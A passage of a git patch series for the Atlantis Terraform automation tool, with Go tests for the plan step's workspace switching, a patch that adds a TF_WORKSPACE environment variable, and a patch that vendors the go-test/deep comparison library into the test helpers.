+			terraform := mocks.NewMockClient()
+			tfVersion, _ := version.NewVersion(c.tfVersion)
+			logger := logging.NewNoopLogger()
+			s := atlantisyaml.PlanStep{
+				Meta: atlantisyaml.StepMeta{
+					Log:                   logger,
+					Workspace:             "workspace",
+					AbsolutePath:          "/path",
+					DirRelativeToRepoRoot: ".",
+					TerraformVersion:      tfVersion,
+					ExtraCommentArgs:      []string{"comment", "args"},
+					Username:              "username",
+				},
+				ExtraArgs:         []string{"extra", "args"},
+				TerraformExecutor: terraform,
+			}
+
+			// Ensure that we actually try to switch workspaces by making the
+			// output of `workspace show` to be a different name.
+			When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("diffworkspace\n", nil)
+
+			expWorkspaceArgs := []string{c.expWorkspaceCommand, "select", "-no-color", "workspace"}
+			When(terraform.RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")).ThenReturn("", errors.New("workspace does not exist"))
+
+			expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+			When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+			output, err := s.Run()
+			Ok(t, err)
+
+			Equals(t, "output", output)
+			// Verify that env select was called as well as plan.
+			terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")
+			terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")
+		})
+	}
+}
+
+func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
+	// Tests that if workspace show says we're on the right workspace we don't
+	// switch.
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+	tfVersion, _ := version.NewVersion("0.10.0")
+	logger := logging.NewNoopLogger()
+	s := atlantisyaml.PlanStep{
+		Meta: atlantisyaml.StepMeta{
+			Log:                   logger,
+			Workspace:             "workspace",
+			AbsolutePath:          "/path",
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      tfVersion,
+			ExtraCommentArgs:      []string{"comment", "args"},
+			Username:              "username",
+		},
+		ExtraArgs:         []string{"extra", "args"},
+		TerraformExecutor: terraform,
+	}
+
+	When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
+
+	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+	When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+	output, err := s.Run()
+	Ok(t, err)
+
+	Equals(t, "output", output)
+	terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")
+
+	// Verify that workspace select was never called.
+	terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, "workspace")
+}
+
+func TestRun_AddsEnvVarFile(t *testing.T) {
+	// Test that if env/workspace.tfvars file exists we use -var-file option.
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+
+	// Create the env/workspace.tfvars file.
+	tmpDir, cleanup := tmpDir_stepTests(t)
+	defer cleanup()
+	err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700)
+	Ok(t, err)
+	envVarsFile := filepath.Join(tmpDir, "env/workspace.tfvars")
+	err = ioutil.WriteFile(envVarsFile, nil, 0644)
+	Ok(t, err)
+
+	// Using version >= 0.10 here so we don't expect any env commands.
+	tfVersion, _ := version.NewVersion("0.10.0")
+	logger := logging.NewNoopLogger()
+	s := atlantisyaml.PlanStep{
+		Meta: atlantisyaml.StepMeta{
+			Log:                   logger,
+			Workspace:             "workspace",
+			AbsolutePath:          tmpDir,
+			DirRelativeToRepoRoot: ".",
+			TerraformVersion:      tfVersion,
+			ExtraCommentArgs:      []string{"comment", "args"},
+			Username:              "username",
+		},
+		ExtraArgs:         []string{"extra", "args"},
+		TerraformExecutor: terraform,
+	}
+
+	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile}
+	When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+	output, err := s.Run()
+	Ok(t, err)
+
+	Equals(t, "output", output)
+	// Verify that env select was never called since we're in version >= 0.10
+	terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace")
+	terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")
+}

From 06f68b88e4961e3a7761255b8af35fa952a7a87a Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 22 Mar 2018 15:20:21 -0700
Subject: [PATCH 05/69] Add TF_WORKSPACE env var when execing terraform

Even though we're switching to the right workspace this is a nice
safeguard to have. I don't think it incurs additional time.
---
 server/events/terraform/terraform_client.go | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index de3d6d23a4..a3508be724 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -107,6 +107,13 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
 		"TF_IN_AUTOMATION=true",
 		// Cache plugins so terraform init runs faster.
 		fmt.Sprintf("TF_PLUGIN_CACHE_DIR=%s", c.terraformPluginCacheDir),
+		// Terraform will run all commands in this workspace. We should have
+		// already selected this workspace but this is a fail-safe to ensure
+		// we're operating in the right workspace.
+		fmt.Sprintf("TF_WORKSPACE=%s", workspace),
+		// We're keeping this variable even though it duplicates TF_WORKSPACE
+		// because it's probably safer for users to rely on it. Terraform might
+		// change the way TF_WORKSPACE works in the future.
 		fmt.Sprintf("WORKSPACE=%s", workspace),
 		fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()),
 		fmt.Sprintf("DIR=%s", path),

From a22e23718c4ea4190a01c9c722b54134c1f7029d Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sat, 24 Mar 2018 18:48:47 -0700
Subject: [PATCH 06/69] Improve test helpers.

---
 Gopkg.lock                                  |   8 +-
 Gopkg.toml                                  |   4 +
 testing/assertions.go                       |  25 +-
 testing/temp_files.go                       |  15 +
 vendor/github.com/go-test/deep/.gitignore   |   2 +
 vendor/github.com/go-test/deep/.travis.yml  |  13 +
 vendor/github.com/go-test/deep/CHANGES.md   |   9 +
 vendor/github.com/go-test/deep/LICENSE      |  21 +
 vendor/github.com/go-test/deep/README.md    |  51 ++
 vendor/github.com/go-test/deep/deep.go      | 352 +++++++++
 vendor/github.com/go-test/deep/deep_test.go | 821 ++++++++++++++++++++
 11 files changed, 1315 insertions(+), 6 deletions(-)
 create mode 100644 testing/temp_files.go
 create mode 100644 vendor/github.com/go-test/deep/.gitignore
 create mode 100644 vendor/github.com/go-test/deep/.travis.yml
 create mode 100644 vendor/github.com/go-test/deep/CHANGES.md
 create mode 100644 vendor/github.com/go-test/deep/LICENSE
 create mode 100644 vendor/github.com/go-test/deep/README.md
 create mode 100644 vendor/github.com/go-test/deep/deep.go
 create mode 100644 vendor/github.com/go-test/deep/deep_test.go

diff --git a/Gopkg.lock b/Gopkg.lock
index 8e3c34c6e2..9b1d483313 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -31,6 +31,12 @@
   revision = "629574ca2a5df945712d3079857300b5e4da0236"
   version = "v1.4.2"
 
+[[projects]]
+  name = "github.com/go-test/deep"
+  packages = ["."]
+  revision = "6592d9cc0a499ad2d5f574fde80a2b5c5cc3b4f5"
+  version = "v1.0.1"
+
 [[projects]]
   branch = "master"
   name = "github.com/google/go-github"
@@ -276,6 +282,6 @@
 [solve-meta]
   analyzer-name = "dep"
   analyzer-version = 1
-  inputs-digest = "00be02ec7fa459d29d2f8b3ab70a8fdf7e6c1085f4a6fd53ab6db452e0ade9da"
+  inputs-digest = "4e5fea92b65446bbdeccbdedfb28fb9c2ea21325b0335b3a4e7b98b60d47ccd6"
   solver-name = "gps-cdcl"
   solver-version = 1
diff --git a/Gopkg.toml b/Gopkg.toml
index 3e16969628..92f54862f5 100644
--- a/Gopkg.toml
+++ b/Gopkg.toml
@@ -88,3 +88,7 @@
 [[constraint]]
   branch = "master"
   name = "github.com/lkysow/go-gitlab"
+
+[[constraint]]
+  name = "github.com/go-test/deep"
+  version = "1.0.1"
diff --git a/testing/assertions.go b/testing/assertions.go
index cd5bf3ba5b..efb2ce9b14 100644
--- a/testing/assertions.go
+++ b/testing/assertions.go
@@ -16,9 +16,11 @@ package testing
 import (
 	"fmt"
 	"path/filepath"
-	"reflect"
 	"runtime"
+	"strings"
 	"testing"
+
+	"github.com/go-test/deep"
 )
 
 // Assert fails the test if the condition is false.
@@ -44,10 +46,11 @@ func Ok(tb testing.TB, err error) {
 // Equals fails the test if exp is not equal to act.
 // Taken from https://github.com/benbjohnson/testing.
 func Equals(tb testing.TB, exp, act interface{}) {
-	if !reflect.DeepEqual(exp, act) {
+	tb.Helper()
+	if diff := deep.Equal(exp, act); diff != nil {
 		_, file, line, _ := runtime.Caller(1)
 		fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act)
-		tb.FailNow()
+		tb.Fatal(diff)
 	}
 }
 
@@ -55,10 +58,22 @@ func Equals(tb testing.TB, exp, act interface{}) {
 func ErrEquals(tb testing.TB, exp string, act error) {
 	tb.Helper()
 	if act == nil {
-		tb.Errorf("exp err %q but err was nil", exp)
+		tb.Fatalf("exp err %q but err was nil", exp)
 	}
 	if act.Error() != exp {
-		tb.Errorf("exp err: %q but got: %q", exp, act.Error())
+		tb.Fatalf("exp err: %q but got: %q", exp, act.Error())
+	}
+}
+
+// ErrContains fails the test if act is nil or act.Error() does not contain
+// substr.
+func ErrContains(tb testing.TB, substr string, act error) {
+	tb.Helper()
+	if act == nil {
+		tb.Fatalf("exp err to contain %q but err was nil", substr)
+	}
+	if !strings.Contains(act.Error(), substr) {
+		tb.Fatalf("exp err %q to contain $q", act.Error(), substr)
 	}
 }
 
diff --git a/testing/temp_files.go b/testing/temp_files.go
new file mode 100644
index 0000000000..f91074967a
--- /dev/null
+++ b/testing/temp_files.go
@@ -0,0 +1,15 @@
+package testing
+
+import (
+	"io/ioutil"
+	"os"
+	"testing"
+)
+
+// TempDir creates a temporary directory and returns its path along
+// with a cleanup function to be called via defer.
+func TempDir(t *testing.T) (string, func()) {
+	tmpDir, err := ioutil.TempDir("", "")
+	Ok(t, err)
+	return tmpDir, func() { os.RemoveAll(tmpDir) }
+}
diff --git a/vendor/github.com/go-test/deep/.gitignore b/vendor/github.com/go-test/deep/.gitignore
new file mode 100644
index 0000000000..53f12f0f0e
--- /dev/null
+++ b/vendor/github.com/go-test/deep/.gitignore
@@ -0,0 +1,2 @@
+*.swp
+*.out
diff --git a/vendor/github.com/go-test/deep/.travis.yml b/vendor/github.com/go-test/deep/.travis.yml
new file mode 100644
index 0000000000..2279c61427
--- /dev/null
+++ b/vendor/github.com/go-test/deep/.travis.yml
@@ -0,0 +1,13 @@
+language: go
+
+go:
+  - 1.7
+  - 1.8
+  - 1.9
+
+before_install:
+  - go get github.com/mattn/goveralls
+  - go get golang.org/x/tools/cover
+
+script:
+  - $HOME/gopath/bin/goveralls -service=travis-ci
diff --git a/vendor/github.com/go-test/deep/CHANGES.md b/vendor/github.com/go-test/deep/CHANGES.md
new file mode 100644
index 0000000000..4351819d68
--- /dev/null
+++ b/vendor/github.com/go-test/deep/CHANGES.md
@@ -0,0 +1,9 @@
+# go-test/deep Changelog
+
+## v1.0.1 released 2018-01-28
+
+* Fixed #12: Arrays are not properly compared (samlitowitz)
+
+## v1.0.0 releaesd 2017-10-27 
+
+* First release
diff --git a/vendor/github.com/go-test/deep/LICENSE b/vendor/github.com/go-test/deep/LICENSE
new file mode 100644
index 0000000000..228ef16f74
--- /dev/null
+++ b/vendor/github.com/go-test/deep/LICENSE
@@ -0,0 +1,21 @@
+MIT License
+
+Copyright 2015-2017 Daniel Nichter
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.
diff --git a/vendor/github.com/go-test/deep/README.md b/vendor/github.com/go-test/deep/README.md
new file mode 100644
index 0000000000..3b78eac7c1
--- /dev/null
+++ b/vendor/github.com/go-test/deep/README.md
@@ -0,0 +1,51 @@
+# Deep Variable Equality for Humans
+
+[![Go Report Card](https://goreportcard.com/badge/github.com/go-test/deep)](https://goreportcard.com/report/github.com/go-test/deep) [![Build Status](https://travis-ci.org/go-test/deep.svg?branch=master)](https://travis-ci.org/go-test/deep) [![Coverage Status](https://coveralls.io/repos/github/go-test/deep/badge.svg?branch=master)](https://coveralls.io/github/go-test/deep?branch=master) [![GoDoc](https://godoc.org/github.com/go-test/deep?status.svg)](https://godoc.org/github.com/go-test/deep)
+
+This package provides a single function: `deep.Equal`. It's like [reflect.DeepEqual](http://golang.org/pkg/reflect/#DeepEqual) but much friendlier to humans (or any sentient being) for two reason:
+
+* `deep.Equal` returns a list of differences
+* `deep.Equal` does not compare unexported fields (by default)
+
+`reflect.DeepEqual` is good (like all things Golang!), but it's a game of [Hunt the Wumpus](https://en.wikipedia.org/wiki/Hunt_the_Wumpus). For large maps, slices, and structs, finding the difference is difficult.
+
+`deep.Equal` doesn't play games with you, it lists the differences:
+
+```go
+package main_test
+
+import (
+	"testing"
+	"github.com/go-test/deep"
+)
+
+type T struct {
+	Name    string
+	Numbers []float64
+}
+
+func TestDeepEqual(t *testing.T) {
+	// Can you spot the difference?
+	t1 := T{
+		Name:    "Isabella",
+		Numbers: []float64{1.13459, 2.29343, 3.010100010},
+	}
+	t2 := T{
+		Name:    "Isabella",
+		Numbers: []float64{1.13459, 2.29843, 3.010100010},
+	}
+
+	if diff := deep.Equal(t1, t2); diff != nil {
+		t.Error(diff)
+	}
+}
+```
+
+
+```
+$ go test
+--- FAIL: TestDeepEqual (0.00s)
+        main_test.go:25: [Numbers.slice[1]: 2.29343 != 2.29843]
+```
+
+The difference is in `Numbers.slice[1]`: the two values aren't equal using Go `==`.
diff --git a/vendor/github.com/go-test/deep/deep.go b/vendor/github.com/go-test/deep/deep.go
new file mode 100644
index 0000000000..4ea14cb04e
--- /dev/null
+++ b/vendor/github.com/go-test/deep/deep.go
@@ -0,0 +1,352 @@
+// Package deep provides function deep.Equal which is like reflect.DeepEqual but
+// returns a list of differences. This is helpful when comparing complex types
+// like structures and maps.
+package deep
+
+import (
+	"errors"
+	"fmt"
+	"log"
+	"reflect"
+	"strings"
+)
+
+var (
+	// FloatPrecision is the number of decimal places to round float values
+	// to when comparing.
+	FloatPrecision = 10
+
+	// MaxDiff specifies the maximum number of differences to return.
+	MaxDiff = 10
+
+	// MaxDepth specifies the maximum levels of a struct to recurse into.
+	MaxDepth = 10
+
+	// LogErrors causes errors to be logged to STDERR when true.
+	LogErrors = false
+
+	// CompareUnexportedFields causes unexported struct fields, like s in
+	// T{s int}, to be comparsed when true.
+	CompareUnexportedFields = false
+)
+
+var (
+	// ErrMaxRecursion is logged when MaxDepth is reached.
+	ErrMaxRecursion = errors.New("recursed to MaxDepth")
+
+	// ErrTypeMismatch is logged when Equal passed two different types of values.
+	ErrTypeMismatch = errors.New("variables are different reflect.Type")
+
+	// ErrNotHandled is logged when a primitive Go kind is not handled.
+	ErrNotHandled = errors.New("cannot compare the reflect.Kind")
+)
+
+type cmp struct {
+	diff        []string
+	buff        []string
+	floatFormat string
+}
+
+var errorType = reflect.TypeOf((*error)(nil)).Elem()
+
+// Equal compares variables a and b, recursing into their structure up to
+// MaxDepth levels deep, and returns a list of differences, or nil if there are
+// none. Some differences may not be found if an error is also returned.
+//
+// If a type has an Equal method, like time.Equal, it is called to check for
+// equality.
+func Equal(a, b interface{}) []string {
+	aVal := reflect.ValueOf(a)
+	bVal := reflect.ValueOf(b)
+	c := &cmp{
+		diff:        []string{},
+		buff:        []string{},
+		floatFormat: fmt.Sprintf("%%.%df", FloatPrecision),
+	}
+	if a == nil && b == nil {
+		return nil
+	} else if a == nil && b != nil {
+		c.saveDiff(b, "<nil pointer>")
+	} else if a != nil && b == nil {
+		c.saveDiff(a, "<nil pointer>")
+	}
+	if len(c.diff) > 0 {
+		return c.diff
+	}
+
+	c.equals(aVal, bVal, 0)
+	if len(c.diff) > 0 {
+		return c.diff // diffs
+	}
+	return nil // no diffs
+}
+
+func (c *cmp) equals(a, b reflect.Value, level int) {
+	if level > MaxDepth {
+		logError(ErrMaxRecursion)
+		return
+	}
+
+	// Check if one value is nil, e.g. T{x: *X} and T.x is nil
+	if !a.IsValid() || !b.IsValid() {
+		if a.IsValid() && !b.IsValid() {
+			c.saveDiff(a.Type(), "<nil pointer>")
+		} else if !a.IsValid() && b.IsValid() {
+			c.saveDiff("<nil pointer>", b.Type())
+		}
+		return
+	}
+
+	// If differenet types, they can't be equal
+	aType := a.Type()
+	bType := b.Type()
+	if aType != bType {
+		c.saveDiff(aType, bType)
+		logError(ErrTypeMismatch)
+		return
+	}
+
+	// Primitive https://golang.org/pkg/reflect/#Kind
+	aKind := a.Kind()
+	bKind := b.Kind()
+
+	// If both types implement the error interface, compare the error strings.
+	// This must be done before dereferencing because the interface is on a
+	// pointer receiver.
+	if aType.Implements(errorType) && bType.Implements(errorType) {
+		if a.Elem().IsValid() && b.Elem().IsValid() { // both err != nil
+			aString := a.MethodByName("Error").Call(nil)[0].String()
+			bString := b.MethodByName("Error").Call(nil)[0].String()
+			if aString != bString {
+				c.saveDiff(aString, bString)
+			}
+			return
+		}
+	}
+
+	// Dereference pointers and interface{}
+	if aElem, bElem := (aKind == reflect.Ptr || aKind == reflect.Interface),
+		(bKind == reflect.Ptr || bKind == reflect.Interface); aElem || bElem {
+
+		if aElem {
+			a = a.Elem()
+		}
+
+		if bElem {
+			b = b.Elem()
+		}
+
+		c.equals(a, b, level+1)
+		return
+	}
+
+	// Types with an Equal(), like time.Time.
+	eqFunc := a.MethodByName("Equal")
+	if eqFunc.IsValid() {
+		retVals := eqFunc.Call([]reflect.Value{b})
+		if !retVals[0].Bool() {
+			c.saveDiff(a, b)
+		}
+		return
+	}
+
+	switch aKind {
+
+	/////////////////////////////////////////////////////////////////////
+	// Iterable kinds
+	/////////////////////////////////////////////////////////////////////
+
+	case reflect.Struct:
+		/*
+			The variables are structs like:
+				type T struct {
+					FirstName string
+					LastName  string
+				}
+			Type = <pkg>.T, Kind = reflect.Struct
+
+			Iterate through the fields (FirstName, LastName), recurse into their values.
+		*/
+		for i := 0; i < a.NumField(); i++ {
+			if aType.Field(i).PkgPath != "" && !CompareUnexportedFields {
+				continue // skip unexported field, e.g. s in type T struct {s string}
+			}
+
+			c.push(aType.Field(i).Name) // push field name to buff
+
+			// Get the Value for each field, e.g. FirstName has Type = string,
+			// Kind = reflect.String.
+			af := a.Field(i)
+			bf := b.Field(i)
+
+			// Recurse to compare the field values
+			c.equals(af, bf, level+1)
+
+			c.pop() // pop field name from buff
+
+			if len(c.diff) >= MaxDiff {
+				break
+			}
+		}
+	case reflect.Map:
+		/*
+			The variables are maps like:
+				map[string]int{
+					"foo": 1,
+					"bar": 2,
+				}
+			Type = map[string]int, Kind = reflect.Map
+
+			Or:
+				type T map[string]int{}
+			Type = <pkg>.T, Kind = reflect.Map
+
+			Iterate through the map keys (foo, bar), recurse into their values.
+		*/
+
+		if a.IsNil() || b.IsNil() {
+			if a.IsNil() && !b.IsNil() {
+				c.saveDiff("<nil map>", b)
+			} else if !a.IsNil() && b.IsNil() {
+				c.saveDiff(a, "<nil map>")
+			}
+			return
+		}
+
+		if a.Pointer() == b.Pointer() {
+			return
+		}
+
+		for _, key := range a.MapKeys() {
+			c.push(fmt.Sprintf("map[%s]", key))
+
+			aVal := a.MapIndex(key)
+			bVal := b.MapIndex(key)
+			if bVal.IsValid() {
+				c.equals(aVal, bVal, level+1)
+			} else {
+				c.saveDiff(aVal, "<does not have key>")
+			}
+
+			c.pop()
+
+			if len(c.diff) >= MaxDiff {
+				return
+			}
+		}
+
+		for _, key := range b.MapKeys() {
+			if aVal := a.MapIndex(key); aVal.IsValid() {
+				continue
+			}
+
+			c.push(fmt.Sprintf("map[%s]", key))
+			c.saveDiff("<does not have key>", b.MapIndex(key))
+			c.pop()
+			if len(c.diff) >= MaxDiff {
+				return
+			}
+		}
+	case reflect.Array:
+		n := a.Len()
+		for i := 0; i < n; i++ {
+			c.push(fmt.Sprintf("array[%d]", i))
+			c.equals(a.Index(i), b.Index(i), level+1)
+			c.pop()
+			if len(c.diff) >= MaxDiff {
+				break
+			}
+		}
+	case reflect.Slice:
+		if a.IsNil() || b.IsNil() {
+			if a.IsNil() && !b.IsNil() {
+				c.saveDiff("<nil slice>", b)
+			} else if !a.IsNil() && b.IsNil() {
+				c.saveDiff(a, "<nil slice>")
+			}
+			return
+		}
+
+		if a.Pointer() == b.Pointer() {
+			return
+		}
+
+		aLen := a.Len()
+		bLen := b.Len()
+		n := aLen
+		if bLen > aLen {
+			n = bLen
+		}
+		for i := 0; i < n; i++ {
+			c.push(fmt.Sprintf("slice[%d]", i))
+			if i < aLen && i < bLen {
+				c.equals(a.Index(i), b.Index(i), level+1)
+			} else if i < aLen {
+				c.saveDiff(a.Index(i), "<no value>")
+			} else {
+				c.saveDiff("<no value>", b.Index(i))
+			}
+			c.pop()
+			if len(c.diff) >= MaxDiff {
+				break
+			}
+		}
+
+	/////////////////////////////////////////////////////////////////////
+	// Primitive kinds
+	/////////////////////////////////////////////////////////////////////
+
+	case reflect.Float32, reflect.Float64:
+		// Avoid 0.04147685731961082 != 0.041476857319611
+		// 6 decimal places is close enough
+		aval := fmt.Sprintf(c.floatFormat, a.Float())
+		bval := fmt.Sprintf(c.floatFormat, b.Float())
+		if aval != bval {
+			c.saveDiff(a.Float(), b.Float())
+		}
+	case reflect.Bool:
+		if a.Bool() != b.Bool() {
+			c.saveDiff(a.Bool(), b.Bool())
+		}
+	case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:
+		if a.Int() != b.Int() {
+			c.saveDiff(a.Int(), b.Int())
+		}
+	case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64:
+		if a.Uint() != b.Uint() {
+			c.saveDiff(a.Uint(), b.Uint())
+		}
+	case reflect.String:
+		if a.String() != b.String() {
+			c.saveDiff(a.String(), b.String())
+		}
+
+	default:
+		logError(ErrNotHandled)
+	}
+}
+
+func (c *cmp) push(name string) {
+	c.buff = append(c.buff, name)
+}
+
+func (c *cmp) pop() {
+	if len(c.buff) > 0 {
+		c.buff = c.buff[0 : len(c.buff)-1]
+	}
+}
+
+func (c *cmp) saveDiff(aval, bval interface{}) {
+	if len(c.buff) > 0 {
+		varName := strings.Join(c.buff, ".")
+		c.diff = append(c.diff, fmt.Sprintf("%s: %v != %v", varName, aval, bval))
+	} else {
+		c.diff = append(c.diff, fmt.Sprintf("%v != %v", aval, bval))
+	}
+}
+
+func logError(err error) {
+	if LogErrors {
+		log.Println(err)
+	}
+}
diff --git a/vendor/github.com/go-test/deep/deep_test.go b/vendor/github.com/go-test/deep/deep_test.go
new file mode 100644
index 0000000000..e764659b95
--- /dev/null
+++ b/vendor/github.com/go-test/deep/deep_test.go
@@ -0,0 +1,821 @@
+package deep_test
+
+import (
+	"errors"
+	"fmt"
+	"testing"
+	"time"
+
+	"github.com/go-test/deep"
+)
+
+func TestString(t *testing.T) {
+	diff := deep.Equal("foo", "foo")
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal("foo", "bar")
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "foo != bar" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestFloat(t *testing.T) {
+	diff := deep.Equal(1.1, 1.1)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(1.1234561, 1.1234562)
+	if diff == nil {
+		t.Error("no diff")
+	}
+
+	defaultFloatPrecision := deep.FloatPrecision
+	deep.FloatPrecision = 6
+	defer func() { deep.FloatPrecision = defaultFloatPrecision }()
+
+	diff = deep.Equal(1.1234561, 1.1234562)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(1.123456, 1.123457)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "1.123456 != 1.123457" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+}
+
+func TestInt(t *testing.T) {
+	diff := deep.Equal(1, 1)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(1, 2)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "1 != 2" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestUint(t *testing.T) {
+	diff := deep.Equal(uint(2), uint(2))
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(uint(2), uint(3))
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "2 != 3" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestBool(t *testing.T) {
+	diff := deep.Equal(true, true)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(false, false)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(true, false)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "true != false" { // unless you're fipar
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestTypeMismatch(t *testing.T) {
+	type T1 int // same type kind (int)
+	type T2 int // but different type
+	var t1 T1 = 1
+	var t2 T2 = 1
+	diff := deep.Equal(t1, t2)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "deep_test.T1 != deep_test.T2" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestKindMismatch(t *testing.T) {
+	deep.LogErrors = true
+
+	var x int = 100
+	var y float64 = 100
+	diff := deep.Equal(x, y)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "int != float64" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	deep.LogErrors = false
+}
+
+func TestDeepRecursion(t *testing.T) {
+	deep.MaxDepth = 2
+	defer func() { deep.MaxDepth = 10 }()
+
+	type s3 struct {
+		S int
+	}
+	type s2 struct {
+		S s3
+	}
+	type s1 struct {
+		S s2
+	}
+	foo := map[string]s1{
+		"foo": { // 1
+			S: s2{ // 2
+				S: s3{ // 3
+					S: 42, // 4
+				},
+			},
+		},
+	}
+	bar := map[string]s1{
+		"foo": {
+			S: s2{
+				S: s3{
+					S: 100,
+				},
+			},
+		},
+	}
+	diff := deep.Equal(foo, bar)
+
+	defaultMaxDepth := deep.MaxDepth
+	deep.MaxDepth = 4
+	defer func() { deep.MaxDepth = defaultMaxDepth }()
+
+	diff = deep.Equal(foo, bar)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "map[foo].S.S.S: 42 != 100" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestMaxDiff(t *testing.T) {
+	a := []int{1, 2, 3, 4, 5, 6, 7}
+	b := []int{0, 0, 0, 0, 0, 0, 0}
+
+	defaultMaxDiff := deep.MaxDiff
+	deep.MaxDiff = 3
+	defer func() { deep.MaxDiff = defaultMaxDiff }()
+
+	diff := deep.Equal(a, b)
+	if diff == nil {
+		t.Fatal("no diffs")
+	}
+	if len(diff) != deep.MaxDiff {
+		t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff)
+	}
+
+	defaultCompareUnexportedFields := deep.CompareUnexportedFields
+	deep.CompareUnexportedFields = true
